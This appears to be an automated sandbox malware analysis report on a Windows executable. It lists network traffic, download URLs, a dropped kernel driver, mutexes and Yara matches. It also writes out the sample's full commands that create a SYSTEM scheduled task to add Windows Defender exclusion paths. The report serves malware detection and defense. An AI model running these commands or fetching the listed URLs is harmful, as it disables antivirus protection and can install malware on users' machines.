Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/i.dat:
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659978186.0000000004907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/w
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 62781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62735
Source: unknownNetwork traffic detected: HTTP traffic on port 62786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62774
Source: unknownNetwork traffic detected: HTTP traffic on port 62780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62776
Source: unknownNetwork traffic detected: HTTP traffic on port 62782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62780
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62781
Source: unknownNetwork traffic detected: HTTP traffic on port 62749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62784
Source: unknownNetwork traffic detected: HTTP traffic on port 62762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62786
Source: unknownHTTPS traffic detected: 39.103.20.34:443 -> 192.168.2.6:62735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:62780 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.EMp3o1.exe.2800000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
PE file contains section with special chars
Source: tbcore3U.dll.6.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.6.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.6.drStatic PE information: section name: .mo:
Source: tbcore3U.dll.40.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.40.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.40.drStatic PE information: section name: .mo:
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140006C95 NtAllocateVirtualMemory,5_2_0000000140006C95
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_000000014000C3F05_2_000000014000C3F0
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_000000014000CC005_2_000000014000CC00
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140001A305_2_0000000140001A30
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_000000014000C2A05_2_000000014000C2A0
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00000001400022C05_2_00000001400022C0
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00000001400110F05_2_00000001400110F0
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140010CF05_2_0000000140010CF0
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00000001400093005_2_0000000140009300
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_000000014000BB705_2_000000014000BB70
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140003F805_2_0000000140003F80
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00000001400103D05_2_00000001400103D0
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00007FFDAC08A1B85_2_00007FFDAC08A1B8
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00007FFDAC0902485_2_00007FFDAC090248
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 41_2_00714AE241_2_00714AE2
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeCode function: 42_2_001F4AE242_2_001F4AE2
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\G5CQjd\G5CQjd.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622438995.00000000048DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622589579.00000000048E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000000.2138846447.0000000141D75000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameInstallVPinMAME.exeR vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622681734.00000000048E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622615056.00000000048E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659978186.0000000004907000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exeBinary or memory string: OriginalFilenameInstallVPinMAME.exeR vs 2b687482300.6345827638.08.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: 5.2.EMp3o1.exe.2800000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal100.evad.winEXE@65/29@12/3
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
Source: C:\Users\user\Documents\EMp3o1.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,5_2_0000000140001430
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Documents\EMp3o1.exeFile created: C:\Program Files (x86)\G5CQjdJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].datJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMutant created: \Sessions\1\BaseNamedObjects\aefd_320946
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5252:120:WilError_03
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMutant created: \Sessions\1\BaseNamedObjects\8.217.47.169:8917:Sauron
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4776:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:936:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2320:120:WilError_03
Source: C:\Users\user\Documents\EMp3o1.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:764:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5896:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1396:120:WilError_03
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCommand line argument: tbcore3.dll41_2_00711000
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCommand line argument: tbcore3.dll41_2_00711000
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCommand line argument: tbcore3U.dll41_2_00711000
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCommand line argument: tbcore3U.dll41_2_00711000
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCommand line argument: .q41_2_00712E30
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeCommand line argument: tbcore3.dll42_2_001F1000
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeCommand line argument: tbcore3.dll42_2_001F1000
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeCommand line argument: tbcore3U.dll42_2_001F1000
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeCommand line argument: tbcore3U.dll42_2_001F1000
Source: 2b687482300.6345827638.08.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Documents\EMp3o1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 2b687482300.6345827638.08.exeVirustotal: Detection: 12%
Source: 2b687482300.6345827638.08.exeReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile read: C:\Users\user\Desktop\2b687482300.6345827638.08.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\2b687482300.6345827638.08.exe "C:\Users\user\Desktop\2b687482300.6345827638.08.exe"
Source: unknownProcess created: C:\Users\user\Documents\EMp3o1.exe C:\Users\user\Documents\EMp3o1.exe
Source: unknownProcess created: C:\Users\user\Documents\EMp3o1.exe C:\Users\user\Documents\EMp3o1.exe
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Program Files (x86)\G5CQjd\G5CQjd.exe "C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
Source: unknownProcess created: C:\Program Files (x86)\G5CQjd\G5CQjd.exe "C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
Source: unknownProcess created: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
Source: unknownProcess created: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
Source: unknownProcess created: C:\Program Files (x86)\G5CQjd\G5CQjd.exe "C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Program Files (x86)\G5CQjd\G5CQjd.exe "C:\Program Files (x86)\G5CQjd\G5CQjd.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.iniJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: mswsock.dllJump to behavior
